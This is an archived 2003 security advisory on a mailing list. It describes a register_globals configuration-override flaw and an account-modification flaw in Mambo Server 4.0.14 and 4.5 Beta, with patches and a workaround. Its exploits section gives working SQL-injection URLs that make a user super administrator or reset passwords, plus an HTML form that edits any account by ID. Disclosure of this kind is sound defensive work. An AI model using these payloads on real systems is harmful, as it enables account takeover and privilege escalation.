lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
From: advisory at security-corporation.com (Security Corporation Security Advisory) Subject: [SCSA-023] Multiple vulnerabilities in Mambo Server ====================================================================== Security Corporation Security Advisory [SCSA-023] Multiple vulnerabilities in Mambo Server ====================================================================== PROGRAM: Mambo Server HOMEPAGE: http://www.mamboserver.com VULNERABLE VERSIONS: 4.0.14 and 4.5 Beta 1.0.3 RISK: Low/MEDIUM IMPACT: Redefining of configuration variables Change of members's and administrator's informations RELEASE DATE: 2003-12-10 ====================================================================== TABLE OF CONTENTS ====================================================================== 1..........................................................DESCRIPTION 2..............................................................DETAILS 3.............................................................EXPLOITS 4............................................................SOLUTIONS 5...........................................................WORKAROUND 6..................................................DISCLOSURE TIMELINE 7..............................................................CREDITS 8...........................................................DISCLAIMER 9...........................................................REFERENCES 10............................................................FEEDBACK 1. DESCRIPTION ====================================================================== "Mambo Open Source is the finest open source Web Content Management System available today. Mambo Open Source makes communicating via the Web easy" (direct quote from Mambo Server website) 2. DETAILS ====================================================================== > Version 4.0.14 : - Redefining of configuration variables : A vulnerability has been discovered in the regglobals.php file that allows unauthorized users to redefine configuration variables. Vulnerable code : ---------------------------------------------------- <?php if (!ini_get('register_globals')) { session_start(); $raw = phpversion(); list($v_Upper,$v_Major,$v_Minor) = explode(".",$raw); if(($v_Upper > 4 && $v_major < 1) || $v_Upper < 4){ $_FILES = $HTTP_POST_FILES; $_ENV = $HTTP_ENV_VARS; $_GET = $HTTP_GET_VARS; $_POST = $HTTP_POST_VARS; $_COOKIE = $HTTP_COOKIE_VARS; $_SERVER = $HTTP_SERVER_VARS; $_SESSION = $HTTP_SESSION_VARS; $_FILES = $HTTP_POST_FILES; } while(list($key,$value)=each($_FILES)) $GLOBALS[$key]=$value; while(list($key,$value)=each($_ENV)) $GLOBALS[$key]=$value; while(list($key,$value)=each($_GET)) $GLOBALS[$key]=$value; while(list($key,$value)=each($_POST)) $GLOBALS[$key]=$value; while(list($key,$value)=each($_COOKIE)) $GLOBALS[$key]=$value; while(list($key,$value)=each($_SERVER)) $GLOBALS[$key]=$value; while(list($key,$value)=each($_SESSION)) $GLOBALS[$key]=$value; foreach($_FILES as $key => $value) { $GLOBALS[$key]=$_FILES[$key]['tmp_name']; foreach($value as $ext => $value2) { $key2 = $key."_".$ext; $GLOBALS[$key2]=$value2; } } } ?> ---------------------------------------------------- We see at first that if register_globals=OFF, all the variables FILES, ENV, GET, POST, COOKIE, SERVER and SESSION will be redefined as global variables (GLOBAL). Only this code raises no problem of security. But if the files : banners.php, pollBooth.php, upload.php, usermenu.php and userpage.php, we can see the following code : ------------------------------ include ("configuration.php"); [...] include ("regglobals.php"); ------------------------------ The configuration.php file contains variables as : ------------------------------------------------------------ $host = 'localhost'; // This is normally set to localhost $user = ''; // MySQL username $password = ''; // MySQL password $db = ''; // MySQL database name $dbprefix = 'mos_'; // Do not change unless you need to! ------------------------------------------------------------ ... It is then possible to an attacker to give new values to all the variables of configurations. For example the pollBooth.php file : ---------------------------------------------------- include("configuration.php"); include('language/'.$lang.'/lang_poll.php'); include("regglobals.php"); [...] switch ($task){ case "Vote": addvote($voteID, $cook, $polls, $dbprefix); break; [...] } function addvote($voteID, $cook, $pollID, $dbprefix){ if ($database==""){ require("classes/database.php"); $database = new database(); } global $sessioncookie; if (empty($sessioncookie)) { print "<SCRIPT>alert(\""._ALERT_ENABLED."\"); window.history.go(-1);</SCRIPT>\n"; } else { if($cook == "1") { print "<SCRIPT> alert(\""._ALREADY_VOTE."\"); window.history.go(-1);</SCRIPT>\n"; } else { if ($voteID == 0){ print "<SCRIPT>alert(\""._NO_SELECTION."\"); window.history.go(-1);</SCRIPT>\n"; } $cvalue = "1"; $cookiename="voted".$pollID; setcookie("$cookiename", $cvalue, time()+87640); } if($cook == "") { if ($voteID > 0) { $query = "UPDATE ".$dbprefix."poll_data SET optionCount=optionCount + 1 WHERE pollid='$pollID' AND voteid='$voteID'"; $database->openConnectionNoReturn($query); $voters = $voters + 1; $query = "UPDATE ".$dbprefix."poll_desc SET voters=voters + 1 WHERE pollID='$pollID'"; $database->openConnectionNoReturn($query); $today = date("Y-m-d G:i:s"); $query = "INSERT INTO ".$dbprefix."poll_date SET date='$today', vote_id='$voteID', poll_id='$pollID'"; $database->openConnectionNoReturn($query); echo "<SCRIPT> alert(\""._THANKS."\"); window.history.go(-1);</SCRIPT>"; } } } } [...] ---------------------------------------------------- It is thus possible to execute any request UPDATE via the pollBooth.php file if register_globals=OFF. > Version 4.5 Beta 1.0.3 : - Change of members's and administrator's informations : A vulnerability has been discovered in the components/com_user/user.php file that allows unauthorized users to change members's and administrator's informations. Vulnerable code : --------------------------------------------------- [...] switch( $task ) { [...] case "saveUserEdit": userSave( $option, $my->id ); break; [...] } [...] function userSave( $option, $uid) { global $database; if ($uid == 0) { echo _NOT_AUTH; return; } $row = new mosUser($database); if(isset($_POST["id"]) && ($_POST["id"] != null || $_POST["id"] != "")) { $row->load($_POST["id"]); $row->orig_password = $row->password; } if (!$row->bind( $_POST )) { echo "<script> alert('".$row->getError()."'); window.history.go(-1); </script>\n"; exit(); } if(isset($_POST["password"]) && $_POST["password"] != "") { if(isset($_POST["verifyPass"]) && ($_POST["verifyPass"] == $_POST["password"])) { $row->password = md5($_POST["password"]); } else { echo "<script> alert('Passwords do not match'); window.history.go(-1); </script>\n"; exit(); } } else { // Restore 'original password' $row->password = $row->orig_password; } if (!$row->check()) { echo "<script> alert('".$row->getError()."'); window.history.go(-1); </script>\n"; exit(); } unset($row->orig_password); // prevent DB error!! if (!$row->store()) { echo "<script> alert('".$row->getError()."'); window.history.go(-1); </script>\n"; exit(); } mosRedirect( "index.php?option=$option" ); } [...] ---------------------------------------------------- It's possible for an attacker to modify many informations about an account via his ID like password, email, name etc... 3. EXPLOITs ====================================================================== > Version 4.0.14 : - Redefining of configuration variables (if magic_quotes_gpc=OFF): # The title of the article N?23 becomes "hop" : http://[target]/pollBooth.php?task=Vote&lang=eng&sessioncookie=1& voteID=1&dbprefix=mos_articles%20SET%20title=char(104,111,112) %20WHERE artid=23/* # The user having id 52 becomes "super administrator" : http://[target]/pollBooth.php?task=Vote&lang=eng&sessioncookie=1& voteID=1&dbprefix=mos_users%20SET%20usertype=char(115,117, 112,101,114,97,100,109,105,110,105,115,116,114,97,116,111,114) %20WHERE%20id=52/* # The password of the user having id 10 becomes 'a' : http://[target]/pollBooth.php?task=Vote&lang=eng&sessioncookie=1& voteID=1&dbprefix=mos_users%20SET%20password=md5(char(97)) %20WHERE%20id=10/* > Version 4.5 Beta 1.0.3 : - Change of members's and administrator's informations : Here is an example that permit to modify informations about an ID account : --------------------exploit.html-------------------- <html> <head></head> <body> <form action="http://[target]/index.php" method="post"> New Name : <inputtype="text" name="name" value=""><br> New E-mail : <input type="text" name="email" value="" size="30"><br> New UserName : <input type="text" name="username" value=""><br> New Password : <input type="password" name="password" value=""><br> Verfiy New Pass : <input type="password" name="verifyPass"><br> ID : <input type="text" name="id" value="1"><br> <input type="hidden" name="option" value="com_user"> <input type="hidden" name="task" value="saveUserEdit"> <input type="submit" name="submit" value="Update"><br> </form> </body> </html> --------------------exploit.html-------------------- 4. SOLUTIONS ====================================================================== You can found patchs at the following link : http://www.phpsecure.info The creator (Robert Castley) was notified, published a patch 2 for version 4.0.1 (works only if the patch 1 was installed) and a Beta 1.0.14 version 4.5 was published for the vulnerabilities of 1.0.13. 5. WORKAROUND ====================================================================== > Version 4.0.14 : In banners.php, pollBooth.php, upload.php, usermenu.php and userpage.php simply add the following line as FIRST LINE, and delete the other inclusions of this file : --------------------------- include ("regglobals.php"); --------------------------- > Version 4.5 Beta 1.0.3 : In the components/com_user/user.php file, in the userSave() function, replace the following lines : ---------------------------------------------------- if(isset($_POST["id"]) && ($_POST["id"] != null || $_POST["id"] != "")) { $row->load($_POST["id"]); $row->orig_password = $row->password; } ---------------------------------------------------- by ---------------------------------------------------- if(isset($_POST["id"]) && ($_POST["id"] != null || $_POST["id"] != "") && $_POST["id"] == $uid) { $row->load($_POST["id"]); $row->orig_password = $row->password; }else{ die("Bad User Id"); } ---------------------------------------------------- 6. DISCLOSURE TIMELINE ====================================================================== 25/11/2003 Vulnerability discovered 25/11/2003 Vendor notified 25/11/2003 Vendor response 25/11/2003 Security Corporation clients notified 28/11/2003 Started e-mail discussions 09/12/2003 Last e-mail received 10/12/2003 Public disclosure 7. CREDITS ====================================================================== frog-m@n <frog-man@...urity-corporation.com> is credited with this discovery Nicolas DE RYCKE <http://www.knowckers.org> is greeted. 8. DISLAIMER ====================================================================== The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. 9. REFERENCES ====================================================================== - Original Version: http://www.security-corporation.com/advisories-023.html - Version Fran?aise: http://www.security-corporation.com/index.php?id=advisories&a=023-FR 10. FEEDBACK ====================================================================== Please send suggestions, updates, and comments to: Security Corporation http://www.security-corporation.com advisory@...urity-corporation.com
Powered by blists - more mailing lists